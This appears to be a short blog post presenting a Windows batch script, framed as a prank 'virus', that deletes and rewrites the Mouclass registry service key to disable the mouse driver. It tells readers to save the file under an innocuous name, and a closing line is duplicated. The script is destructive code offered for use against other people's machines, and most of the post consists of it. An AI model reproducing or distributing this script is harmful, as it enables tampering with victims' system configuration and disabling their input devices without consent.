I had previously posted on making different Batch Files which were interesting and completely
harmless.
Today we will be making a batch virus which is harmfull or mostly used for joking or playing prank with friends, it
will Disable your Mouse so think before trying it on yourself.
You dont need any kind of software or tool for this, just open Notepad and paste the below code.
Click Here - > For similar Batch File Virus / Programing on Tech-Attacks .
CODE :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
now, Save this file as GJsHidMous.bat
And you are Done, you just created your virus.
And you are Done, you just created your virus.
No comments:
Post a Comment